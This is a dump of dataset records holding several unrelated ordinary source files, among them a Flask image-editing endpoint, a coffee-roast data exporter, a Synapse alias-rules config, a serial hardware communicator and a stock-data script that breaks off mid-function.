\"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n\r\n@app.route('/translate', methods=[\"POST\"])\r\ndef translate_func():\r\n \r\n dx = json.loads(request.form['dx'])\r\n dy = json.loads(request.form['dy'])\r\n dz = json.loads(request.form['dz'])\r\n sx = json.loads(request.form['sx'])\r\n sy = json.loads(request.form['sy'])\r\n stop_points = json.loads(request.form['stop_points'])\r\n zi = json.loads(request.form['zi'])\r\n zo = json.loads(request.form['zo'])\r\n\r\n input_img = demo.translate([dx,dy],sxsy=[sx,sy],stop_points=stop_points,zoom_in=zi,zoom_out=zo)\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n\r\n@app.route('/changestyle', methods=[\"POST\"])\r\ndef changestyle_func():\r\n input_img = demo.change_style()\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n\r\n@app.route('/reset', methods=[\"POST\"])\r\ndef reset_func():\r\n input_img = demo.reset()\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n res = {'img':input_base64}\r\n return json.dumps(res)\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=False, host='0.0.0.0', port=8000)","repo_name":"endo-yuki-t/UserControllableLT","sub_path":"interface/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":273,"dataset":"github-code","pt":"95"} +{"seq_id":"71807788154","text":"#! /usr/bin/env python3\n\nimport argparse\nimport csv\nimport datetime\nimport json\nimport os\nimport sys\n\n#\n# Roastime control codes.\n#\ncodes_by_control = {\n 'power': 0,\n 'fan': 1,\n 'drum': 2,\n}\n\ncontrols_by_code = {v:k for k,v in codes_by_control.items()}\n\n\n#\n# Roast fields for sample arrays.\n#\nroast_sample_fields = [\n 'beanDerivative',\n 'beanTemperature',\n 'drumTemperature',\n]\n\n\n#\n# Functions for computing event fields.\n#\ndef make_get_sample(index_field):\n '''\n Get a sampled field at an index.\n '''\n\n def get_sample(roast_json, source_field):\n try:\n index = min(roast_json[index_field], len(roast_json[source_field]) - 1)\n return roast_json[source_field][index]\n except:\n raise\n sys.stderr.write(f'failed to get sample {source_field} using index field {index_field}\\n')\n return None\n\n return get_sample\n\n\ndef make_get_control(control):\n '''\n Get a control value at an index.\n '''\n\n control_code = codes_by_control[control]\n def get_control(roast_json, source_field):\n current_value = None\n index_value = roast_json[source_field]\n\n try:\n action_times = roast_json['actions']['actionTimeList']\n for action in action_times:\n if action['ctrlType'] != control_code:\n continue\n\n if action['index'] > index_value:\n return current_value\n\n current_value = action['value']\n\n if current_value is not None:\n return current_value\n\n sys.stderr.write(f'index value {index_value} not within control range\\n')\n return None\n except:\n sys.stderr.write(f'failed to get control {control} using index field {source_field}\\n')\n raise\n return None\n\n return get_control\n\n\ndef make_conversion(conversion_type):\n '''\n Coerce a roast field to a specific type.\n '''\n\n def conversion(roast_json, source_field):\n value = roast_json[source_field]\n return None if value is None else conversion_type(value)\n\n return conversion\n\n\ndef seconds_from_index(roast_json, source_field):\n '''\n Convert an index field to a time value in seconds.\n '''\n\n try:\n return roast_json[source_field] / roast_json['sampleRate']\n except:\n sys.stderr.write(f'failed to get convert {source_field} to time value\\n')\n return None\n\n\n#\n# Set up basic fields.\n#\nroast_fields = [\n {'fields': ['dateTime'], 'mapped_field': ('date', lambda roast_json, source_field: datetime.datetime.fromtimestamp(roast_json[source_field] / 1000).strftime('%Y-%m-%d')) },\n {'fields': ['dateTime'], 'mapped_field': ('time', lambda roast_json, source_field: datetime.datetime.fromtimestamp(roast_json[source_field] / 1000).strftime('%H:%M:%S')) },\n\n 'dateTime',\n 'uid',\n 'roastNumber',\n 'roastName',\n 'beanId',\n 'rating',\n\n 'serialNumber',\n 'firmware',\n 'hardware',\n\n {'fields': ['ambient', 'ambientTemp'], 'mapped_field': ('ambient', make_conversion(float))},\n {'fields': ['humidity', 'roomHumidity'], 'mapped_field': ('humidity', make_conversion(float))},\n {'fields': ['weightGreen'], 'mapped_field': ('weightGreen', make_conversion(float))},\n {'fields': ['weightRoasted'], 'mapped_field': ('weightRoasted', make_conversion(float))},\n\n 'preheatTemperature',\n 'beanChargeTemperature',\n 'beanDropTemperature',\n 'drumChargeTemperature',\n 'drumDropTemperature',\n \n 'totalRoastTime',\n 'sampleRate',\n 'roastStartIndex',\n 'indexYellowingStart',\n 'indexFirstCrackStart',\n 'indexFirstCrackEnd',\n 'indexSecondCrackStart',\n 'indexSecondCrackEnd',\n 'roastEndIndex',\n]\n\n#\n# Work around event naming inconsistencies.\n#\nevents = [\n ('roastStart', True),\n ('roastEnd', True),\n ('YellowingStart', False),\n ('FirstCrackStart', False),\n ('FirstCrackEnd', False),\n ('SecondCrackStart', False),\n ('SecondCrackEnd', False),\n]\n\n\ndef get_event_field(event_name, prepend, field):\n return f'{event_name}{field.capitalize()}' if prepend else f'{field}{event_name}'\n\n\n#\n# Add computed event fields.\n#\nfor event_name, prepend in events:\n #\n # Fields for event times.\n #\n source_field = get_event_field(event_name, prepend, 'index')\n destination_field = get_event_field(event_name, prepend, 'seconds')\n roast_fields.append({'fields': [source_field], 'mapped_field': (destination_field, seconds_from_index) })\n\n #\n # Fields for event control values.\n #\n for control in codes_by_control.keys():\n source_field = get_event_field(event_name, prepend, 'index')\n destination_field = get_event_field(event_name, prepend, control)\n roast_fields.append({'fields': [source_field], 'mapped_field': (destination_field, make_get_control(control)) })\n\n #\n # Fields for event sample values.\n #\n for roast_sample_field in roast_sample_fields:\n source_field = get_event_field(event_name, prepend, 'index')\n destination_field = get_event_field(event_name, prepend, roast_sample_field)\n roast_fields.append({'fields': [roast_sample_field], 'mapped_field': (destination_field, make_get_sample(source_field)) })\n\n\ndef set_roast_column(roast_json, roast_columns, roast_field):\n if 'mapped_field' in roast_field:\n mapped_field, mapping_fn = roast_field['mapped_field']\n if 'fields' in roast_field:\n #\n # Map a source field (optionally involving arbitrary\n # data as specified in the mapping function).\n #\n for field in roast_field['fields']:\n if field in roast_json:\n roast_columns[mapped_field] = mapping_fn(roast_json, field)\n return\n else:\n #\n # Compute a value from arbitrary roast fields.\n #\n roast_columns[mapped_field] = mapping_fn(roast_json, None)\n\n sys.stderr.write(f'failed to retrieve data for {mapped_field}\\n')\n roast_columns[mapped_field] = None\n return\n \n roast_columns[roast_field] = roast_json.get(roast_field, None)\n\n\ndef create_roast(roast_json):\n roast = {}\n for roast_field in roast_fields:\n try:\n set_roast_column(roast_json, roast, roast_field)\n except:\n sys.stderr.write(f'an exception occurred while processing field {roast_field}')\n raise\n\n return roast\n\n\ndef load_roasts(roast_dirname):\n roasts = []\n for roast_filename in os.listdir(roast_dirname):\n roast_pathname = os.path.join(roast_dirname, roast_filename)\n sys.stderr.write(f'loading {roast_pathname}\\n')\n with open(roast_pathname, 'r', encoding='utf-8') as roast_file:\n roast_json = json.load(roast_file)\n roast = create_roast(roast_json)\n roasts.append(roast)\n \n return roasts\n\n\ndef get_fields():\n return [f if 'mapped_field' not in f else f['mapped_field'][0] for f in roast_fields]\n\n\ndef write_roasts(csv_file, roasts, fields):\n writer = csv.writer(csv_file)\n writer.writerow(fields)\n for roast in roasts:\n writer.writerow([roast[field] for field in fields])\n\n\ndef main():\n default_fields = ['date', 'time', 'beanId', 'weightGreen']\n valid_fields = ', '.join(get_fields())\n epilog = f'Valid field names are: {valid_fields}'\n\n parser = argparse.ArgumentParser(description='Convert RoasTime roast data to CSV.', epilog=epilog)\n parser.add_argument('-f', '--fields', help=f'comma-separated list of fields (default is {\",\".join(default_fields)})')\n parser.add_argument('output_file', metavar='PATH', help='CSV file name (default is stdout)', nargs='?')\n\n if sys.platform.startswith('linux'):\n config_path = os.environ.get('XDG_CONFIG_HOME', os.path.join(os.path.expanduser('~'), '.config'))\n elif sys.platform == 'darwin':\n config_path = os.path.join(os.path.expanduser('~'), 'Library', 'Application Support')\n elif sys.platform in ['win32', 'cygwin']:\n config_path = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming')\n else:\n raise NotImplementedError(f'platform {sys.platform} is not supported')\n\n args = parser.parse_args()\n roast_path = os.path.join(config_path, 'roast-time', 'roasts')\n roasts = load_roasts(roast_path)\n fields = default_fields if args.fields is None else args.fields.split(',')\n file_id = sys.stdout.fileno() if args.output_file is None else args.output_file\n with open(file_id, 'w', newline='') as csv_file:\n write_roasts(csv_file, roasts, fields)\n\n\nif __name__ == '__main__':\n rv = main()\n sys.exit(rv)\n","repo_name":"jglogan/roastime-data","sub_path":"dump_roasts.py","file_name":"dump_roasts.py","file_ext":"py","file_size_in_byte":8747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"18937201679","text":"from synapse.util import glob_to_regex\n\nfrom ._base import Config, ConfigError\n\n\nclass RoomDirectoryConfig(Config):\n def read_config(self, config):\n alias_creation_rules = config[\"alias_creation_rules\"]\n\n self._alias_creation_rules = [\n _AliasRule(rule)\n for rule in alias_creation_rules\n ]\n\n def default_config(self, config_dir_path, server_name, **kwargs):\n return \"\"\"\n # The `alias_creation` option controls who's allowed to create aliases\n # on this server.\n #\n # The format of this option is a list of rules that contain globs that\n # match against user_id and the new alias (fully qualified with server\n # name). The action in the first rule that matches is taken, which can\n # currently either be \"allow\" or \"deny\".\n #\n # If no rules match the request is denied.\n alias_creation_rules:\n - user_id: \"*\"\n alias: \"*\"\n action: allow\n \"\"\"\n\n def is_alias_creation_allowed(self, user_id, alias):\n \"\"\"Checks if the given user is allowed to create the given alias\n\n Args:\n user_id (str)\n alias (str)\n\n Returns:\n boolean: True if user is allowed to crate the alias\n \"\"\"\n for rule in self._alias_creation_rules:\n if rule.matches(user_id, alias):\n return rule.action == \"allow\"\n\n return False\n\n\nclass _AliasRule(object):\n def __init__(self, rule):\n action = rule[\"action\"]\n user_id = rule[\"user_id\"]\n alias = rule[\"alias\"]\n\n if action in (\"allow\", \"deny\"):\n self.action = action\n else:\n raise ConfigError(\n \"alias_creation_rules rules can only have action of 'allow'\"\n \" or 'deny'\"\n )\n\n try:\n self._user_id_regex = glob_to_regex(user_id)\n self._alias_regex = glob_to_regex(alias)\n except Exception as e:\n raise ConfigError(\"Failed to parse glob into regex: %s\", e)\n\n def matches(self, user_id, alias):\n \"\"\"Tests if this rule matches the given user_id and alias.\n\n Args:\n user_id (str)\n alias (str)\n\n Returns:\n boolean\n \"\"\"\n\n # Note: The regexes are anchored at both ends\n if not self._user_id_regex.match(user_id):\n return False\n\n if not self._alias_regex.match(alias):\n return False\n\n return True\n","repo_name":"Jd8111997/ChatClub","sub_path":"synapse/config/room_directory.py","file_name":"room_directory.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"5562841789","text":"# Напишите функцию double power (double a, int n), вычисляющую значение a^n.\ndef power(a, n):\n s = 1\n for i in range(n):\n s *= a\n return s\n\n\na = input().split()\n# for i in range(len(a)):\n# a[i] = int(a[i])\n\nprint(int(power(float(a[0]), int(a[1]))))\n","repo_name":"Renittka/Web_2020","sub_path":"week8/problems/informatics/functions/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3143848662","text":"# This is a collection of scripts that will allow manipulation of CAMI profiling files\nimport copy\nimport logging\nfrom abc import ABC, abstractmethod\n\n\nclass ProfileABC(ABC):\n def __init__(self, sample_metadata=None, profile=None):\n self.sample_metadata = sample_metadata\n self.profile = profile\n self._data = dict()\n # Stick in the root node just to make sure everything is consistent\n self._data[\"-1\"] = dict()\n self._data[\"-1\"][\"rank\"] = None\n self._data[\"-1\"][\"tax_path\"] = list()\n self._data[\"-1\"][\"tax_path_sn\"] = list()\n self._data[\"-1\"][\"abundance\"] = 0\n self._data[\"-1\"][\"descendants\"] = list()\n self._header = list()\n self._tax_id_pos = None\n self._rank_pos = None\n self._tax_path_pos = None\n self._tax_path_sn_pos = None\n self._abundance_pos = None\n self._eps = .0000000000000001 # This is to act like zero, ignore any lines with abundance below this quantity\n self._all_keys = [\"-1\"]\n self._merged_flag = False\n\n @staticmethod\n def get_branch_length_function(function_str):\n try:\n return eval(function_str)\n except SyntaxError as exception:\n logging.getLogger('opal').warning('Invalid function provided with -b, --branch_length_function: {}. lambda x: 1/x will be used.'.format(exception.msg))\n return eval('lambda x: 1/float(x)')\n\n @abstractmethod\n def parse_file(self):\n pass\n\n def write_file(self, out_file_name=None):\n if out_file_name is None:\n raise Exception\n _data = self._data\n keys = _data.keys()\n # This will be annoying to keep things in order...\n # Let's iterate on the length of the tax_path since we know that will be in there\n tax_path_lengths = max([len(_data[key][\"tax_path\"]) for key in keys])\n fid = open(out_file_name, 'w')\n # Write the header\n for head in self._header:\n fid.write(\"%s\\n\" % head)\n\n # Loop over length of tax_path and write data\n # always make the output tax_id, rank, tax_path, tax_path_sn, abundance in that order\n for path_length in range(1, tax_path_lengths + 1):\n for key in keys:\n if len(_data[key][\"tax_path\"]) == path_length and _data[key][\"abundance\"] > self._eps:\n line_data = _data[key]\n fid.write(\"%s\\t\" % key)\n if self._rank_pos is not None:\n fid.write(\"%s\\t\" % line_data[\"rank\"])\n fid.write(\"%s\\t\" % \"|\".join(line_data[\"tax_path\"]))\n if self._tax_path_sn_pos is not None:\n fid.write(\"%s\\t\" % \"|\".join(line_data[\"tax_path_sn\"]))\n fid.write(\"%f\\n\" % line_data[\"abundance\"])\n fid.close()\n return\n\n def _subtract_down(self):\n # helper function to push all the weights up by subtracting\n # NOTE: when subtracting, need to start at root and go down\n # NOTE: when adding, need to start at leaves and go up\n _data = self._data\n keys = _data.keys()\n # This will be annoying to keep things in order...\n # Let's iterate on the length of the tax_path since we know that will be in there\n tax_path_lengths = max([len(_data[key][\"tax_path\"]) for key in keys])\n for path_length in range(1, tax_path_lengths): # eg tax_path_lengths = 5, use 1,2,3,4 since we stop at leaves\n for key in keys:\n if len(_data[key][\"tax_path\"]) == path_length:\n descendants = _data[key][\"descendants\"] # get all descendants\n for descendant in descendants:\n _data[key][\"abundance\"] -= _data[descendant][\"abundance\"] # subtract the descendants abundance\n\n def _add_up(self):\n # helper function to push all the weights up by subtracting\n # NOTE: when subtracting, need to start at root and go down\n # NOTE: when adding, need to start at leaves and go up\n _data = self._data\n keys = _data.keys()\n # This will be annoying to keep things in order...\n # Let's iterate on the length of the tax_path since we know that will be in there\n tax_path_lengths = max([len(_data[key][\"tax_path\"]) for key in keys])\n for path_length in range(tax_path_lengths, 1,\n -1): # eg tax_path_lengths = 5, use 5,4,3,2, since we stop at roots\n for key in keys:\n if len(_data[key][\"tax_path\"]) == path_length:\n ancestor = _data[key][\"ancestor\"]\n if ancestor in _data: # don't do anything if this is a/the root node\n _data[ancestor][\"abundance\"] += _data[key][\"abundance\"] # add the descendants abundance\n\n def normalize(self):\n # Need to really push it up while subtracting, then normalize, then push up wile adding\n # self._push_up(operation=\"subtract\")\n self._subtract_down()\n _data = self._data\n keys = _data.keys()\n total_abundance = 0\n for key in keys:\n total_abundance += _data[key][\"abundance\"]\n # print(total_abundance)\n for key in keys:\n if total_abundance > 0:\n _data[key][\"abundance\"] /= total_abundance\n _data[key][\"abundance\"] *= 100 # make back into a percentage\n # self._push_up(operation=\"add\")\n self._add_up()\n return\n\n def merge(self, other):\n # Warning: not checking for taxonomic consistency\n if not isinstance(other, ProfileABC):\n print(\"Only works with other Profiles\")\n raise Exception\n if self._merged_flag is False:\n self._header.insert(0, \"# This is a merged file, ignore files in headers below\")\n self._merged_flag = True\n _data = self._data\n _other_data = other._data\n other_keys = _other_data.keys()\n for key in other_keys:\n if key in _data:\n _data[key][\"abundance\"] += _other_data[key][\"abundance\"] # if already in there, add abundances\n else:\n _data[key] = copy.copy(_other_data[key]) # otherwise use the whole thing\n\n @abstractmethod\n def make_unifrac_input_and_normalize(self, other):\n pass\n","repo_name":"CAMI-challenge/OPAL","sub_path":"cami_opal/utils/ProfilingToolsABC.py","file_name":"ProfilingToolsABC.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"95"} +{"seq_id":"22187996824","text":"import glob\nimport logging as logger\nfrom itertools import chain\nimport sys\nimport time\nfrom queue import Queue\nfrom threading import Lock, Thread\n\nimport serial\nfrom serial.tools import list_ports\n\nfrom .status_handler import Status, StatusHandler\nfrom .task_models import Task\n\nfrom .backend_connector import BackendConnector, MetricsData\n\nSTATE_UP = 0\n\nvidpid_pairs = set(\n [\n (0x2341, 0x43), # Arduino Uno R3\n (0x1A86, 0x7523), # CH340\n (0x1A86, 0x7522), # CH340\n (0x1A86, 0x5523), # CH341 in serial mode\n (0x1A86, 0x7584), # CH340S\n ]\n)\n\n\nclass WriterThread(Thread):\n statusHandler: StatusHandler\n message_queue: Queue\n port: serial.Serial = None\n is_running: bool = True\n last_ask_timestamp: int = 0\n ask_period: int = 5 # every n seconds send '?' char to request current status. Do it in pseudo-async way\n\n def __init__(self, statusHandler: StatusHandler, askperiod: int = 5):\n super(WriterThread, self).__init__()\n self.statusHandler = statusHandler\n self.message_queue = Queue()\n self.ask_period = askperiod\n\n def set_serial_port(self, serialport: serial.Serial):\n self.port = serialport\n\n def stop(self):\n self.is_running = False\n\n def send(self, message: str):\n msg = message.encode(\"ascii\")\n if message[-2:] != \"\\r\\n\":\n msg += \"\\r\\n\".encode(\"ascii\")\n self.message_queue.put(msg)\n\n def run(self):\n\n while self.is_running:\n\n try:\n msg = self.message_queue.get(block=True, timeout=self.ask_period)\n self.port.write(msg)\n except Exception as e:\n # here we should suppress Empty exception and handle all the others\n # logger.debug(f\"There was some error while sending a message: {e}\")\n pass\n\n if int(time.time()) - self.last_ask_timestamp >= self.ask_period:\n self.send(\n \"?\\r\\n\"\n ) # According to the protocol, question mark is requesting a report of the current status of every component\n self.last_ask_timestamp = int(time.time())\n\n\nclass HardwareCommunicator(Thread):\n statusHandler: StatusHandler\n writerThread: WriterThread\n backendConnector: BackendConnector\n port: serial.Serial = None\n baudrate: int = 115200 # fallback to default value\n is_running: bool = True\n status_report_lock: Lock = Lock()\n\n def __init__(self, backendConnector, statusHandler, arguments, *args):\n super(HardwareCommunicator, self).__init__()\n self.statusHandler = statusHandler\n self.baudrate = arguments.baudrate\n self.backendConnector = backendConnector\n\n self.writerThread = WriterThread(statusHandler, arguments.interval)\n\n self.status_report = {\n \"containers\": {\n \"C1\": None, # (float_switch_up [0 or 1], pressure [hPa])\n \"C2\": None,\n \"C3\": None,\n \"C4\": None,\n \"C5\": None,\n },\n \"ref_pressure\": 0.0, # only pressure\n \"pumps\": {\n \"P1\": None, # (current [A], voltage [V])\n \"P2\": None,\n \"P3\": None,\n \"P4\": None,\n },\n \"valves\": {\n \"V1\": None,\n \"V2\": None,\n \"V3\": None,\n },\n }\n\n def open_serial_port(self):\n sport = None\n\n for port in list(list_ports.comports()):\n if port.vid and port.pid:\n if (port.vid, port.pid) in vidpid_pairs:\n print(f\"Found a serial port. Location: {port.device}\")\n sport = port.device\n break\n\n if not sport:\n logger.error(\"No valid COM port was found. Check your USB device.\")\n self.statusHandler.setStatus(Status(500, \"No valid COM port was found.\"))\n\n try:\n self.port = serial.Serial(sport, self.baudrate, timeout=2)\n self.writerThread.set_serial_port(self.port)\n self.writerThread.start() # start writer thread\n self.statusHandler.setStatus(\n Status(200, \"Serial port opened successfully.\")\n )\n except:\n logger.error(f\"Can't open serial port {sport}\")\n self.statusHandler.setStatus(Status(500, f\"Can't open serial port {sport}\"))\n\n def stopAllComponents(self):\n comps = chain.from_iterable([list(self.status_report[\"pumps\"].keys()), list(self.status_report[\"valves\"].keys())])\n for c in comps:\n command = f\"SET {c} OFF\"\n logger.debug(f\"Sending command: {command}\")\n self.send(command)\n logger.debug(\"Everything should be OFF by now.\")\n\n def processTask(self, task: Task):\n\n if task.target == 'stop' and task.action == 'stop':\n self.stopAllComponents()\n return\n\n command = f'SET {task.target} {\"ON\" if task.value==1.0 else \"OFF\"}'\n\n self.send(command)\n\n def send(self, message: str):\n self.writerThread.send(message)\n\n def stop(self):\n logger.debug(\"Shutting down hardware communication thread...\")\n self.writerThread.stop()\n self.writerThread.join()\n self.is_running = False\n\n def parse_debug_message(self, line: str):\n if \"FAIL\" in line:\n self.statusHandler.setStatus(Status(503, line))\n return\n\n if \"REPORT\" in line and \"FINISHED\" in line:\n self.status_report_lock.acquire()\n\n metrics = list(chain.from_iterable(chain.from_iterable([list(x.values()) if type(x)==dict else [[x]] for x in self.status_report.values()])))\n #logger.debug(f\"Metrics: {metrics}\")\n try:\n self.backendConnector.push_metrics(metrics)\n except Exception as e:\n logger.error(f\"Error while sending the metrics: {e}\")\n self.status_report_lock.release()\n\n def set_pump_details(self, id: str, first_value: str, second_value: str):\n logger.debug(f\"Got pump setting: {id} {first_value} {second_value}\")\n self.status_report[\"pumps\"][id[1:]] = (MetricsData(measurement=\"current\", field=id[1:], value=float(first_value)), MetricsData(measurement=\"voltage\", field=id[1:], value=float(second_value)))\n\n def set_valve_details(self, id: str, first_value: str, second_value: str):\n logger.debug(f\"Got valve setting: {id} {first_value} {second_value}\")\n self.status_report[\"valves\"][id[1:]] = (MetricsData(measurement=\"current\", field=id[1:], value=float(first_value)), MetricsData(measurement=\"voltage\", field=id[1:], value=float(second_value)))\n\n def set_container_details(self, id: str, first_value: str, second_value: str):\n logger.debug(f\"Got container setting: {id} {first_value} {second_value}\")\n if id == \"$RF\":\n self.status_report[\"ref_pressure\"] = MetricsData(measurement=\"pressure\", field=\"reference\", value=float(second_value)) # float(second_value)\n return\n self.status_report[\"containers\"][id[1:]] = (MetricsData(measurement=\"float_switch_up\", field=id[1:], value=1.0-float(first_value)), MetricsData(measurement=\"pressure\", field=id[1:], value=float(second_value)))\n\n def parse_value_message(self, line: str):\n \"\"\"\n format of the message: $Cx 0 1023.28 - report of a container status, first number tells whether float switch is up or down (by default, 1-down, 0-up), second: pressure in a container\n $Px 0.00 0.00 - report of a pump status, first number: current flowing through the component, second: voltage\n $Vx 0.00 0.00 - report of a valve status, first number: current flowing through the component, second: voltage\n \"\"\"\n\n self.status_report_lock.acquire()\n\n {\n \"C\": self.set_container_details,\n \"R\": self.set_container_details,\n \"P\": self.set_pump_details,\n \"V\": self.set_valve_details,\n }[line[1]](*(line.split(\" \")))\n\n self.status_report_lock.release()\n\n def parse_line(self, line: bytes):\n \"\"\"\n Parse pure message straight from the serial port. It should be an ascii-encoded bytes object.\n \"\"\"\n if len(line) < 1:\n return\n decoded = line.decode(\"ascii\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n if \"Water\" in decoded:\n logger.debug(\n f\"Got the hello message. We are good to go. Protocol version: {decoded.split(' ')[-1]}\"\n )\n return\n # logger.debug(f\"Get line: {decoded}\")\n try:\n {\">\": self.parse_debug_message, \"$\": self.parse_value_message}[decoded[0]](\n decoded\n )\n except Exception as e:\n logger.debug(f\"Unrecognized command: {decoded}\")\n\n def run(self):\n\n self.open_serial_port()\n\n line = b\"\"\n\n while self.is_running:\n\n if self.port.is_open:\n c = self.port.read(1)\n line += c\n if len(line) > 1 and (\n line[-2:].decode(\"ascii\") == \"\\r\\n\" or line[-1] == b\"\\n\"\n ):\n self.parse_line(line)\n line = b\"\"\n else:\n time.sleep(3) # avoid spinning the loop constantly\n\n \n","repo_name":"WaterTreatmentLab/connector","sub_path":"src/connector/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":9453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42900477648","text":"# CS 3100 Team 8\n# Spring 2021\n#\n# This file contains the functions needed to display the game over screen after a\n# session is completed. If the final score of the game is a new high score, it\n# will prompt the user to enter their name and add the score to the database.\n\nimport pygame as pg\nimport sys\nfrom button import Button\nimport leaderboard as lb\nfrom inputbox import InputBox\n\ndef show_game_over(window, score):\n\t# Button colors\n\tlight_color = (\"#50dbd4\")\t# light teal\n\tdark_color = (\"#27aca5\")\t# dark teal\n\n\t# Store the width and height of the window\n\ts_width = window.get_width()\n\ts_height = window.get_height()\n\n\t# Define button dimensions\n\tbutton_width = 600\n\tbutton_height = 60\n\n\t# Define the game over screen dimensions and position\n\tg_width = 380\n\tg_height = 600\n\tg_x = (s_width - g_width) / 2\n\tg_y = (s_height - g_height) / 2\n\tg_radius = 30\n\n\t# Load game over image and determine placement position\n\timg = pg.image.load(\"game_over_round.png\")\n\timg_width = img.get_width()\n\timg_pos = (g_x+4, g_y+4)\n\timg_small = pg.transform.scale(img, (g_width-8, g_height-8))\n\n\t# Create the QUIT button in the bottom left corner\n\tquit_pos = (10, s_height - button_height - 10)\n\tquit_button = Button(quit_pos, button_width/2, button_height, text='EXIT GAME')\n\n\t# Create the BACK button in the bottom right corner\n\tback_pos = (s_width - button_width/2 - 10, s_height - button_height - 10)\n\tback_button = Button(back_pos, button_width/2, button_height, text='BACK')\n\n\t# Create the PLAY AGAIN button on the game over screen\n\tplay_again_pos = (g_x + (g_width - button_width/2)/2, g_y + (g_height - 100))\n\tplay_again_button = Button(play_again_pos, button_width/2, button_height, text='PLAY AGAIN')\n\n\t# List of all buttons on this window\n\tbutton_list = [quit_button, back_button, play_again_button]\n\n\t# Retrieve the top ten scores to be placed in the table\n\ttable_data = lb.return_top_ten()\n\t# print(table_data)\n\n\t# Define a text box for the user's name\n\tbox_w = 300\n\tbox_h = 60\n\t# InputBox(x, y, w, h)\n\tname_box = InputBox(g_x + (g_width - box_w)/2, g_y + (g_height - 450), box_w, box_h)\n\tinput_boxes = [name_box]\n\n\t### MENU LOOP ###\n\trunning = True\n\twhile running:\n\t\t# Store the current mouse coordinates\n\t\tmouse = pg.mouse.get_pos()\n\n\t\t# Loop through all events\n\t\tfor event in pg.event.get():\n\t\t\t# If a quit event is found, then exit the application\n\t\t\tif event.type == pg.QUIT:\n\t\t\t\t# Exit application\n\t\t\t\tsys.exit()\n\n\t\t\t# If the mouse is clicked\n\t\t\tif event.type == pg.MOUSEBUTTONDOWN:\n\t\t\t\t# If the mouse is positioned over the QUIT button\n\t\t\t\tif quit_button.is_over(mouse):\n\t\t\t\t\t# Exit application\n\t\t\t\t\tsys.exit()\n\t\t\t\t\n\t\t\t\t# If the mouse is positioned over the BACK button\n\t\t\t\tif back_button.is_over(mouse):\n\t\t\t\t\trunning = False\n\t\t\t\t\tbreak\n\n\t\t\t\t# If mouse is over play again, then launch another game session\n\t\t\t\tif play_again_button.is_over(mouse):\n\t\t\t\t\trunning = False\n\t\t\t\t\treturn True\n\n\t\t\t# Handle input box events\n\t\t\tfor box in input_boxes:\n\t\t\t\toutput = box.handle_event(event)\n\t\t\t\tif output != \"\":\n\t\t\t\t\tprint(\"Submission received:\", output, \"/\", score)\n\t\t\t\t\tlb.add_entry(output, score)\n\n\t\t# Create a rectangle to outline the game over screen\n\t\tpg.draw.rect(window, \"black\", (g_x, g_y, g_width, g_height), border_radius=g_radius)\n\t\twindow.blit(img_small, img_pos)\n\n\t\t# Draw the GAME OVER text\n\t\ttext = \"GAME OVER\"\n\t\tfont = pg.font.SysFont('freesansbold.ttf', 64)\n\t\tlabel = font.render(text, 1, \"white\")\n\t\twindow.blit(label, (g_x + 50, g_y + 40))\n\n\t\t# Draw the Final Score text\n\t\ttext = \"Final Score: \" + str(int(score))\n\t\tfont = pg.font.SysFont('freesansbold.ttf', 32)\n\t\tlabel = font.render(text, 1, \"white\")\n\t\twindow.blit(label, (g_x + 50, g_y + 100))\n\n\t\t# Draw the buttons one at a time, checking if mouse is hovering\n\t\tfor button in button_list:\n\t\t\t# Highlight buttons when moused over\n\t\t\tif button.is_over(mouse):\n\t\t\t\t\tbutton.draw(window, light_color)\n\t\t\telse:\n\t\t\t\tbutton.draw(window, dark_color)\n\n\t\t# Draw the input box\n\t\tfor box in input_boxes:\n\t\t\tbox.draw(window)\n\n\t\t# Updates the frame\n\t\tpg.display.update()\n\n\treturn False","repo_name":"tmorgan181/Space_Blocks","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2230335423","text":"import argparse\nimport json\nimport quandl\nimport pandas as pd\n\nimport stock_constants\n\nquandl.ApiConfig.api_key = \"s-GMZ_xkw6CrkGYUWs1p\"\n\n\ndef fetch_stock_data(stock, show_profits, show_volume, show_bad_days):\n \"\"\" Fetch and print data about a stock. \"\"\"\n print(\"Data for stock ticker:\", stock)\n stock_data = get_stock_data(stock,\n stock_constants.START_DATE,\n stock_constants.END_DATE)\n\n display_basic_stock_data(stock_data)\n if show_profits:\n print(get_max_daily_profit(stock_data))\n if show_volume:\n print(get_high_volume_days(stock_data))\n if show_bad_days:\n print(\"Number of bad days: {} for the analysis period\".format(\n get_bad_days(stock_data)))\n\n\ndef display_basic_stock_data(stock_data):\n \"\"\" Print stock data for each month of the analysis period.\n Data displayed:\n (start_date, end_date, average_closing_price, average_opening_price)\n \"\"\"\n print(\"Basic Stock Data for each month between Jan and July 2017:\")\n year = 2017\n for month in range(1, 7):\n month_data = fetch_monthly_data(stock_data, year, month)\n average_close = float(month_data[['close']].mean())\n average_open = float(month_data[['open']].mean())\n print(json.dumps(\n {stock_constants.START_DATE_KEY: create_first_of_month_timestamp(year, month),\n stock_constants.END_DATE_KEY: create_first_of_month_timestamp(year, month + 1),\n 